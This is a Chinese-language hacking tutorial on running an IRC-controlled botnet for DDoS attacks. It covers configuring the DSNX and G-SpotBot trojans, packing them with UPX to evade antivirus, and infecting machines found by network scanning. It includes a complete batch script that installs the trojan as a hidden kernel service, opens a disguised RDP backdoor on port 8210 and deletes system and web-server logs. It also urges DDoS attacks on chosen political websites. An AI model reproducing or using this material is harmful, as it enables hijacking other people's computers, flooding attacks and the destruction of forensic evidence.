IRC牧马全攻略

有时候我们为了发动一次DDOS攻击或者为了构建一个能够实现DDOS攻击的系统，会大量的寻找“肉鸡”，但是众多的“肉鸡”，特别是那些动态IP的机器，给我的管理工作带来很大的困难，于是我们想到了利用IRC来管理、控制“肉鸡”，这样即使“肉鸡”的IP地址是动态的，重启后依然会到设定的IRC房间报到，我们只需要使用一些预先设定的命令就可以控制这台机器来进行需要的操作，这样会大大提高我们的管理效率和攻击力度。下面就开始我们的IRC牧马之旅吧：）。 

一、IRC房间的申请和IRC木马的配置 
   
  要用IRC来养马，当然需要一个或者多个IRC房间（也叫频道）了，现在有很多IRC服务器都提供房间注册的，我们以irc.cnirc.org为例，来简单介绍一下如何获取一个IRC房间，首先我们使用IRC工具Hirc 2000连接到服务器，使用命令/nick [nickname]来选择一个你自己喜欢的名字，如果这个名字没有被注册，那么使用/ns [register] [password] [email] 来注册。成功之后请一定记住密码，下次登录你需要用/pass [password] 来验证身份。下面就要注册房间了，用命令/join #[roomname] 来创建一个你喜欢的房间，如果房间的名字没有被注册，那么在弹出的窗口中输入/cs register #[roomname] [password] [description] （如图1）来注册这个房间，成功之后请记住房间的密码，配置木马的时候会用到。另外[description]（房间主题的描述）尽量不要写一些无意义的东西，系统会定期检查。当然你也不能很直接的就写个：偶用来养马的房间，小小管理员和你急。 
  房间注册好了，下面就该主角出场了，IRC马很多但是精品却少，中文版的IRC马几乎没有，（Meteor写的那个Slackbot开了后门，你不会用吧？）所以这次只能给大家介绍两款国外的IRC木马：DATASPY NETWORK X[DSNX 版本0.5]，作者在这款马的说明文档中指出：“尽管当前IRC木马众多，并在不断发展，但是没有一款能像DSNX那样提供稳定的服务和众多的功能。”并且该马还提供插件支持（例如下文提到的用于本地局域网中进行端口扫描的portscan v2的插件）。下面我们就来看一下如何配置DSNX。（如图2） 
IRC Server（s）：填写IRC服务器地址，DSXN支持多个IRC服务器地址，如果你输入了多个地址，他会随机挑选一个进行连接， 
                 如果不能连接就选择下一个地址。 
Channel & Key:  填写#房间名称 房间密码。（就是你注册房间的时候填的密码） 

Port：IRC服务器的端口，一般为6667，不用更改。 

Normal&Admin Password:普通控制密码与超级控制密码的区别在于普通控制密码不能使用'set' 'upgrade' 和 'update'命令，                      这些是重设、升级更新木马的命令。你设置的密码会被MD5加密。 

Match Hostmask：主机匹配标识，在使用login命令之前登录的主机必须是指定的机器才可以使用login命令来验证身份。（*是默认值，一般我们也不更改它，如果你一定要改范围只能是"*"、"?"和单独分开字母或数字。） 

Command Prefix：!（命令前缀，可以更改，至于改成什么就随你喜欢了。） 

Custom：自定义木马启动命令（不是必选项，前面要加你设定的前缀， 
        例如“！plugins add *.dsnx”、“!format d：/u /q /autoset”）. 
Simultaneous Logins：同时登录者的数量，如果要和朋友一起使用可以设为2、3等。不设置代表无限制。 

Reply To：木马回应，，默认回应频道或者查询或者频道通知中的一个。 
以上设置，请参您的实际情况设置，特别是IRC Server一项，最好能区别对待，例如专门在日本、韩国、美国等IRC服务器上注册房间用来养不同地区的马，这样可以避免无法连接，IP限制，速度过慢等情况。 
  当我们成功登录后，木马会发出一个确认信息（如图3，若是马儿多场面可就壮观了。），然后我们就可以运行木马内置的命令来执行任务了。DSXN内置了非常多的命令，比较常用的有： 

1、Upload/Download files 上传/下载文件 [<PREFIX>webdl url <file>] 

2、Perform a port scan on the local area network 在本地局域网中进行端口扫描 [需要一个名为portscan v2的插件支持] 

3、Flood a specified IP address 对指定的IP地址进行FLOOD攻击 [<PREFIX>flood IP Packge Size] 

4、runs a file on the dsnx client machine 在服务端运行程序 [<PREFIX>run file <don't_hide>] 

5、Manages port redirects 端口重定向 [<PREFIX>portr new in_port <server> <out_port>] 

6、Delete files 删除文件 [<prefix>plugins del "portscan v2"] 

还有其他很多的命令,就不一一列出,去看帮助命令吧。另外一款好的IRC木马是G-SpotBot(版本2.0)增加很多有趣的功能（例如，隐身、自动OP等）,当然它的Flood功效也很强，你可以试试。需要说明的是这两款木马有已经被列入病毒库了，所以在使用前我们应该用UPX或者Aspack压缩一下，本文中我将其用upx压缩后命名为windrv32.exe。 
   
二、木马种植工作和DDOS对象的选择 
   
  最后我们需要做的就是去获取大量肉鸡并种植IRC马了，为了尽可能长期地占有这些肉鸡，我们应该给肉鸡打个补丁，并更改一下DSNX的启动方式（由原来的注册表启动，改为系统关键性服务。），这里推荐一个高效的方法，我们将配置好的DSNX和下面这个批处理（批处理内容见光盘中patch.txt）做成一个自解压文件，然后我们用20cn的scanipc.exe（20cn最近放出了正式版，兄弟一并奉上。）来扫描一个比较大的网段，（一些需要注意的细节我用图4、5、6来表示）一般一个晚上就可以获得大量的“肉鸡”了。一个简单的DDOS系统就这样实现了，你只需要发出一条命令，就可以让各个"肉鸡"开始FLOOD~~,但是我还想提醒一下各位玩DDOS的朋友，真正危险的不是那疏于管理的Admin，而是科班出生的网警叔叔们，您也别认为删了日志就安全了，通过路由一样可以找到你：（，所以如果你一定要玩，选个好的对象吧，例如：宣扬法论功的邪教网站、反华亲日的反动网站…… 这或许也是一种斗争的艺术吧：）。G00D Luck！ 




＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝下面是patch.bat的内容＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝ 
@echo Windows Registry Editor Version 5.00 >patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll 

@echo "AutoShareServer"=dword:00000000 >>patch.dll 
@echo "AutoShareWks"=dword:00000000 >>patch.dll 
@REM [禁止共享] 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll 
@echo "restrictanonymous"=dword:00000001 >>patch.dll 
@REM [禁止匿名登录] 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll 
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll 
@REM [禁止及文件访问和打印共享] 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll 
@echo "ShutdownWithoutLogon"="0" >>patch.dll 
@REM [禁止登录前关机] 

@echo "DontDisplayLastUserName"="1" >>patch.dll 
@REM [禁止显示前一个登录用户名称] 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll 
@echo "PortNumber"=dword:00002010 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll 
@echo "PortNumber"=dword:00002012 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll 
@echo "Start"=dword:00000002 >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll 
@echo "Start"=dword:00000002 >>patch.dll 
@echo "ErrorControl"=dword:00000001 >>patch.dll 
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll 
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll 
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll 
@echo "ObjectName"="LocalSystem" >>patch.dll 
@echo "Type"=dword:00000010 >>patch.dll 
@echo "Description"="Keep record of the program and windows' message。" >>patch.dll 
@echo "DisplayName"="Microsoft EventLog" >>patch.dll 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll 
@echo "Start"=dword:00000004 >>patch.dll 
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe 
@REM [修改3389连接，端口为8210，名称为Microsoft EventLog，留条后路] 

@start windrv32.exe 
@attrib +h +r windrv32.exe 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll 
@echo "windsnx "=- >>patch.dll 
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe 
@REM [删除DSNXDE在注册表中的启动项，将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动。] 

@regedit /s patch.dll 

@net stop w3svc 
@net stop event log 
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 
@del c:\winnt\system32\config\*.event /f /q 
@del c:\winnt\system32dtclog\*.* /f /q 
@del c:\winnt\*.txt /f /q 
@del c:\winnt\*.log /f /q 
@net start w3svc 
@net start event log 
@rem [删除日志] 


@net stop lanmanserver /y 
@net start lanmanserver 
@net stop Schedule /y 
@net stop @REMoteRegistry /y 
@del patch.dll 
@echo The server has been patched,the terminal servece's ports has been change to 8210,also the DSNX has been registered as a kneral service,Have a fun. 
@del patch.bat 
@del dsnx.exe 
@REM [禁止一些危险的服务。]